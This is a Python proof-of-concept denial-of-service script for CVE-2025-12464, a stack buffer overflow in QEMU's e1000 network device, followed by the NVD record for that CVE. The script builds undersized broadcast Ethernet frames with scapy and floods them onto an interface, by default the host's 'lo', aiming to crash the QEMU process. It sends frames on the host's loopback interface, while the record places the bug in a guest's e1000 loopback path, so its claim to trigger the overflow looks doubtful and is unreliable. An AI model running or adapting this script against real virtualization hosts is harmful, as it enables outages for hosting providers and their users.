CVE-2025-12464

# CVE-2025-12464 PoC - QEMU e1000 Stack Buffer Overflow in Loopback Mode # This PoC demonstrates sending a crafted short frame to trigger the vulnerability from scapy.all import Ether, Raw, sendp import sys def create_crafted_short_frame(): """ Create a crafted short frame that triggers buffer overflow in e1000_receive_iov() The frame is intentionally smaller than minimum Ethernet frame size (60 bytes) to trigger the padding code path in loopback mode. """ # Create an Ethernet frame with payload smaller than minimum frame size # Minimum Ethernet frame is 60 bytes (excluding CRC), but we send much smaller short_payload = b'A' * 32 # Intentionally undersized payload # Craft the Ethernet frame # In loopback mode, this frame will be processed by e1000_receive_iov() # without proper padding, potentially causing buffer overflow eth_frame = Ether(dst='ff:ff:ff:ff:ff:ff', src='00:11:22:33:44:55') / Raw(short_payload) return eth_frame def send_crafted_packets(interface='lo', count=100): """ Send crafted short frames to trigger the vulnerability Args: interface: Network interface to send packets on (default: loopback) count: Number of packets to send """ print(f"[*] Creating crafted short frames for CVE-2025-12464") print(f"[*] Target interface: {interface}") print(f"[*] Sending {count} malicious packets...") # Create the crafted frame frame = create_crafted_short_frame() # Display frame info print(f"[*] Frame size: {len(frame)} bytes (intentionally undersized)") print(f"[*] Payload size: {len(frame.payload)} bytes") # Send the crafted packets # In a vulnerable QEMU setup with e1000 device in loopback mode, # this should trigger the buffer overflow in e1000_receive_iov() try: sendp(frame, iface=interface, count=count, verbose=0) print(f"[+] Sent {count} crafted packets successfully") print("[+] If target QEMU is vulnerable, it should crash with stack buffer overflow") except Exception as e: print(f"[-] Error sending packets: {e}") return False return True if __name__ == '__main__': print("=" * 60) print("CVE-2025-12464 QEMU e1000 Buffer Overflow PoC") print("Target: QEMU e1000 network device in loopback mode") print("Effect: Denial of Service (QEMU process crash)") print("=" * 60) # Allow command line interface specification interface = sys.argv[1] if len(sys.argv) > 1 else 'lo' count = int(sys.argv[2]) if len(sys.argv) > 2 else 100 send_crafted_packets(interface=interface, count=count)

{"cve": {"id": "CVE-2025-12464", "sourceIdentifier": "[email protected]", "published": "2025-10-31T22:15:32.977", "lastModified": "2026-05-06T16:16:02.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack-based buffer overflow was found in the QEMU e1000 network device. The code for padding short frames was dropped from individual network devices and moved to the net core code. The issue stems from the device's receive code still being able to process a short frame in loopback mode. This could lead to a buffer overrun in the e1000_receive_iov() function via the loopback code path. A malicious guest user could use this vulnerability to crash the QEMU process on the host, resulting in a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-12464", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408845", "source": "[email protected]"}, {"url": "https://gitlab.com/qemu-project/qemu/-/issues/3043", "source": "[email protected]"}]}}